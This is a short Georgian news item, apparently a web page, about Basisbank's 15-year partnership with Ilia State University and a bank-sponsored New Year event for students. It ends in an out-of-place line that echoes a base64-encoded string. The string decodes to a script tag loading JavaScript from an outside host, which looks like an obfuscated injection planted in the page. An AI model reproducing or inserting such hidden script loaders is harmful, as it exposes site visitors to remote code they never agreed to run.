celsiusi
ავერსი საქკაბელი

"ბაზისბანკსა" და ილიას სახელმწიფო უნივერსიტეტს შორის თანამშრომლობა 15 წლის წინ დაიწყო და დღემდე წარმატებით გრძელდება. ამჯერად, "ბაზისბანკის" მხარდაჭერით, ილიაუნის სტუდენტებისთვის წლის შემაჯამებელი საახალწლო ღონისძიება გაიმართა.

"ბაზისბანკი" წლების განმავლობაში უზრუნველყოფს ილიაუნის მაგისტრების განათლების დაფინანსებას და ბაკალავრიატის, მაგისტრატურისა და დოქტორანტურის სტუდენტების სტაჟირებასა და დასაქმებას ბანკში, სტუდენტების პერსონალური კომპიუტერებით უზრუნველყოფას. ბანკს თავისი წვლილი შეაქვს უნივერსიტეტის მატერიალურ-ტექნიკური ბაზის აღჭურვაში.

„ბაზისბანკი", როგორც მაღალი სოციალური პასუხისმგებლობის მქონე ფინანსური ინსტიტუტი, ახალი თაობისა და განათლების სფეროს მუდმივი მხარდამჭერია. განათლების მხარდაჭერის პრიორიტეტული პროექტების ფარგლებში, უკვე 15 წელია ილიას სახელმწიფო უნივერსიტეტის ერთგული პარტნიორი ვართ, რაც გამოიხატება ყოველწლიურად განხორციელებულ ერთობლივ პროექტებში და მომავალშიც არაერთხელ ვიტყვით მნიშვნელოვან სიტყვას მომავალი თაობის განათლებისა და წახალისების მიმართულებით“, - აცხადებს "ბაზისბანკის" სტრატეგიული კომუნიკაციების დეპარტამენტის უფროსი, თამარ ხადური.

258
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");